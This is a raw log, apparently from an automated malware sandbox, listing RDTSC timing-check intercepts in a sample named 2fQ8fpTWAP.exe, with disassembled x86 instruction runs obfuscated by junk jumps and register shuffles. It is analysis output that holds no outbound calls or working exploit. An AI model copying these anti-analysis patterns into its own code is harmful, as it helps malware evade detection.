Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40155 second address: 4F40159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40159 second address: 4F40171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40171 second address: 4F40177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40177 second address: 4F4017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4017C second address: 4F401C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7A2CC6ACF6h 0x0000000a sbb si, 0D18h 0x0000000f jmp 00007F7A2CC6ACEBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7A2CC6ACF4h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F401C2 second address: 4F401D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F16Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F401D4 second address: 4F40221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7A2CC6ACF4h 0x00000013 sub al, 00000008h 0x00000016 jmp 00007F7A2CC6ACEBh 0x0000001b popfd 0x0000001c push esi 0x0000001d mov eax, edi 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7A2CC6ACEDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40221 second address: 4F40231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40231 second address: 4F40259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7A2CC6ACF0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40259 second address: 4F4025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F4025D second address: 4F40263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F40263 second address: 4F4029D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F7A2D39F171h 0x00000017 adc cx, FD96h 0x0000001c jmp 00007F7A2D39F171h 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60BB8 second address: 4F60BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60BBE second address: 4F60BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60BC2 second address: 4F60BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60BC6 second address: 4F60C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7A2D39F174h 0x00000010 add esi, 09C545B8h 0x00000016 jmp 00007F7A2D39F16Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d pushfd 0x0000001e jmp 00007F7A2D39F16Fh 0x00000023 jmp 00007F7A2D39F173h 0x00000028 popfd 0x00000029 pop eax 0x0000002a popad 0x0000002b mov dword ptr [esp], ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 movzx eax, di 0x00000034 mov bl, 0Fh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60C2A second address: 4F60C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60C30 second address: 4F60C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60786 second address: 4F607D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7A2CC6ACECh 0x00000008 pop eax 0x00000009 call 00007F7A2CC6ACEBh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pushad 0x00000014 mov edi, ecx 0x00000016 call 00007F7A2CC6ACEEh 0x0000001b mov ch, 44h 0x0000001d pop edi 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7A2CC6ACF9h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F607D9 second address: 4F6080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7A2D39F16Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7A2D39F178h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F6080C second address: 4F6081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F6081B second address: 4F60820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F6067C second address: 4F60680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60680 second address: 4F60684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60684 second address: 4F6068A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F6068A second address: 4F606A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7A2D39F16Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F606A9 second address: 4F606C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F606C6 second address: 4F60720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2D39F177h 0x00000009 jmp 00007F7A2D39F173h 0x0000000e popfd 0x0000000f call 00007F7A2D39F178h 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7A2D39F16Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F603E0 second address: 4F60455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2CC6ACEFh 0x00000009 adc ax, 17FEh 0x0000000e jmp 00007F7A2CC6ACF9h 0x00000013 popfd 0x00000014 mov ecx, 42F53447h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F7A2CC6ACEAh 0x00000022 push eax 0x00000023 jmp 00007F7A2CC6ACEBh 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F7A2CC6ACF6h 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov edx, 5D426B70h 0x00000038 mov eax, edx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F7013A second address: 4F7018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2D39F16Fh 0x00000009 sub ch, FFFFFF8Eh 0x0000000c jmp 00007F7A2D39F179h 0x00000011 popfd 0x00000012 push eax 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F7A2D39F16Ah 0x0000001d push eax 0x0000001e jmp 00007F7A2D39F16Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F7018D second address: 4F70191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F70191 second address: 4F70197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F70197 second address: 4F701AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bh, ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA0586 second address: 4FA058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA058A second address: 4FA05A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA05A7 second address: 4FA05AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA05AD second address: 4FA05B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA05B1 second address: 4FA064C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov dx, cx 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 movsx edx, si 0x0000001b pushfd 0x0000001c jmp 00007F7A2D39F16Eh 0x00000021 or ecx, 00DB5DF8h 0x00000027 jmp 00007F7A2D39F16Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F7A2D39F178h 0x00000034 sub cl, 00000058h 0x00000037 jmp 00007F7A2D39F16Bh 0x0000003c popfd 0x0000003d popad 0x0000003e xchg eax, ebp 0x0000003f jmp 00007F7A2D39F176h 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F7A2D39F16Ah 0x0000004f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA064C second address: 4FA0650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA0650 second address: 4FA0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA0656 second address: 4FA066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4FA066F second address: 4FA068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F8023D second address: 4F80241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F80241 second address: 4F80247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F80247 second address: 4F80259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 4E28h 0x00000007 mov bh, 24h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F80259 second address: 4F8027D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1F47E2B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7A2D39F176h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F8027D second address: 4F802C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F7A2CC6ACF6h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 call 00007F7A2CC6ACF3h 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F802C2 second address: 4F802DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F175h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60575 second address: 4F605B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 326Eh 0x00000007 pushfd 0x00000008 jmp 00007F7A2CC6ACEFh 0x0000000d or al, 0000001Eh 0x00000010 jmp 00007F7A2CC6ACF9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f movsx ebx, cx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F605B6 second address: 4F6060E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7A2D39F171h 0x00000009 sbb ch, 00000006h 0x0000000c jmp 00007F7A2D39F171h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F7A2D39F170h 0x00000018 xor ecx, 36EC42A8h 0x0000001e jmp 00007F7A2D39F16Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F6060E second address: 4F60614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F60614 second address: 4F6063C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A2D39F177h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F70CD9 second address: 4F70CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F70CDF second address: 4F70D5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7A2D39F176h 0x00000011 push eax 0x00000012 jmp 00007F7A2D39F16Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bx, CE66h 0x0000001f pushfd 0x00000020 jmp 00007F7A2D39F177h 0x00000025 and ecx, 425138EEh 0x0000002b jmp 00007F7A2D39F179h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F80025 second address: 4F8004D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 mov si, C8D7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7A2CC6ACF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F8004D second address: 4F8005D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7A2D39F16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90D74 second address: 4F90DC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7A2CC6ACF6h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F7A2CC6ACF0h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7A2CC6ACF7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90DC6 second address: 4F90E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 4F0C93E2h 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 xchg eax, ecx 0x00000015 pushad 0x00000016 mov di, si 0x00000019 pushfd 0x0000001a jmp 00007F7A2D39F16Ch 0x0000001f jmp 00007F7A2D39F175h 0x00000024 popfd 0x00000025 popad 0x00000026 mov eax, dword ptr [775165FCh] 0x0000002b jmp 00007F7A2D39F16Eh 0x00000030 test eax, eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7A2D39F177h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90E45 second address: 4F90F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7A2CC6ACEFh 0x00000008 pop eax 0x00000009 mov ebx, 596BE67Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F7A9F16D7ECh 0x00000017 jmp 00007F7A2CC6ACEBh 0x0000001c mov ecx, eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F7A2CC6ACF4h 0x00000025 or si, C0C8h 0x0000002a jmp 00007F7A2CC6ACEBh 0x0000002f popfd 0x00000030 pushad 0x00000031 mov edi, esi 0x00000033 pushfd 0x00000034 jmp 00007F7A2CC6ACF2h 0x00000039 adc al, 00000028h 0x0000003c jmp 00007F7A2CC6ACEBh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 xor eax, dword ptr [ebp+08h] 0x00000047 jmp 00007F7A2CC6ACEFh 0x0000004c and ecx, 1Fh 0x0000004f jmp 00007F7A2CC6ACF6h 0x00000054 ror eax, cl 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 call 00007F7A2CC6ACEDh 0x0000005e pop eax 0x0000005f movsx edx, ax 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90F03 second address: 4F90F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90F09 second address: 4F90F6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2CC6ACF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F7A2CC6ACEEh 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00622014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007F7A3161BB5Ch 0x0000002c push FFFFFFFEh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ecx, ebx 0x00000033 pushfd 0x00000034 jmp 00007F7A2CC6ACF9h 0x00000039 adc ax, 8616h 0x0000003e jmp 00007F7A2CC6ACF1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90F6F second address: 4F90F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7A2D39F16Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90F94 second address: 4F90F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90F9A second address: 4F90F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F90F9E second address: 4FA005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F7A3162AC1Fh 0x00000010 mov edi, edi 0x00000012 jmp 00007F7A2CC6ACEFh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F7A2CC6ACF6h 0x0000001d push eax 0x0000001e jmp 00007F7A2CC6ACEBh 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 call 00007F7A2CC6ACF4h 0x0000002a mov edi, esi 0x0000002c pop esi 0x0000002d mov si, dx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov cx, 0221h 0x0000003a push esi 0x0000003b pop edi 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F5001C second address: 4F5007A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7A2D39F173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F7A2D39F176h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F7A2D39F170h 0x00000018 and esp, FFFFFFF8h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7A2D39F177h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F5007A second address: 4F50080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2fQ8fpTWAP.exe RDTSC instruction interceptor: First address: 4F50080 second address: 4F50084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
